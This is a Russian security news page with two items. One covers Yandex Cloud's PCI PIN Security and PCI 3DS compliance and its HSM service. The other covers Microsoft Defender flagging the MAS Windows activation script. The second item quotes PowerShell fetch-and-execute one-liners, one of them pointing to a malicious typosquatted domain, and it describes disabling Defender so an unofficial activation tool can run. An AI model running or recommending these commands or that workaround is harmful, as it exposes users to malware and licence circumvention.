Yandex Cloud подтвердила соответствие стандартам PCI PIN Security, PCI 3DS

Yandex Cloud подтвердила соответствие стандартам PCI PIN Security, PCI 3DS

Yandex Cloud подтвердила соответствие стандартам PCI PIN Security, PCI 3DS

Облачная платформа Yandex Cloud расширила возможности для безопасного хранения финансовых данных в облаке. Провайдер получил подтверждение соответствия международным стандартам безопасности данных PCI PIN Security и PCI 3DS.

Помимо этого, Yandex Cloud запустила предоставление аппаратного модуля безопасности (HSM) как сервис – это специализированное вычислительное устройство с высоким уровнем шифрования данных. Теперь клиенты платформы смогут повысить уровень защиты чувствительной информации, в том числе данных банковских карт, в платежных приложениях и сервисах.

Соответствие Yandex Cloud PCI PIN Security позволит компаниям, которые оказывают финансовые услуги, разрабатывают платежные шлюзы или системы электронных денежных переводов, безопасно управлять, обрабатывать и передавать PIN-коды в облаке. PCI 3DS регулирует безопасный прием и обработку ecommerce-транзакций в Yandex Cloud.

Международным стандартам соответствуют самые востребованные облачные сервисы: инфраструктурные, платформа данных, контейнеризация приложений, бессерверные вычисления. Аудит соответствия мер защиты и документации платформы Yandex Cloud провела компания Deiteriy.

С помощью устройств HSM клиенты Yandex Cloud смогут хранить криптографические ключи для шифрования данных. Платформа предоставляет решение, при котором во время выполнения операций с чувствительной информацией ключи обрабатываются исключительно внутри HSM-cервера. Только у клиента остается полный административный и криптографический контроль над выделенными устройствами HSM. Это позволяет исключить случаи, когда, например, информация может остаться в памяти незащищенной виртуальной машины, и минимизировать атаки злоумышленников.

Ранее платформа Yandex Cloud уже подтвердила соответствие требованиям федерального закона № 152-ФЗ «О персональных данных» и Общего регламента о защите данных (General Data Protection Regulation, GDPR). Также по результатам аудита Yandex Cloud соответствует международным стандартам информационной безопасности: ISO/IEC 27001:2013, ISO/IEC 27017:2015, ISO/IEC 27018:2019, PCI DSS, ГОСТ 57580.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru